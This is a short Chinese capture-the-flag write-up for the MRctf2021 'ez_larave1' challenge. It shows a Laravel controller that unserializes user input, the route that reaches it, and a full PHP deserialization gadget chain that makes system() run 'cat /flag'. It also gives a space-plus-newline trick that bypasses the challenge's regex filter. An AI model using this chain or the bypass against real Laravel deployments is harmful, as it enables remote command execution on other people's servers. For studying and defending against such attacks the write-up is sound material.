MRctf2021
ez_larave1
害……只做出来这一道签到题
本来以为和20年一样是自己找pop,硬是找不到菜到放弃了,结果一搜搜到个cve……
先找反序列化利用点:
TaskController.php:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
| class TaskController
{
public function index(){
if(isset($_GET['action']) && preg_match('/serialize\/*$/i', $_GET['action'])){
exit(1);
}
if(preg_match('/serialize/i', basename( $_GET['action']))){
if(isset($_GET['ser'])){
$ser = $_GET['ser'];
unserialize($ser);
return ;
}else{
echo "no unserialization";
return ;
}
}
}
}
|
index方法……
这里学到了,先查询相关框架的路由加载方式,看路由:
https://laravelacademy.org/post/8731.html
web.php:
1
2
3
4
5
| Route::get('/', function () {
return view('welcome');
});
Route::get('/hello','TaskController@index');
|
访问/hello时,会加载TaskController类的index方法,这里就是提交点。
利用方法:cve
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
| <?php
namespace Illuminate\Broadcasting{
class PendingBroadcast
{
protected $events;
protected $event;
public function __construct($events="",$event="")
{
$this->events = $events;
$this->event = $event;
}
}
}
namespace Illuminate\Bus{
class Dispatcher
{
protected $queueResolver = "system";
}
}
namespace Illuminate\Broadcasting{
class BroadcastEvent
{
public $connection = "cat /flag";
}
}
namespace{
$d = new Illuminate\Bus\Dispatcher();
$b = new Illuminate\Broadcasting\BroadcastEvent();
$p = new Illuminate\Broadcasting\PendingBroadcast($d,$b);
echo urlencode(serialize($p));
}
?>
|
菜到直接拿脚本……匹配那个直接 空格+%0a污染即可绕过。
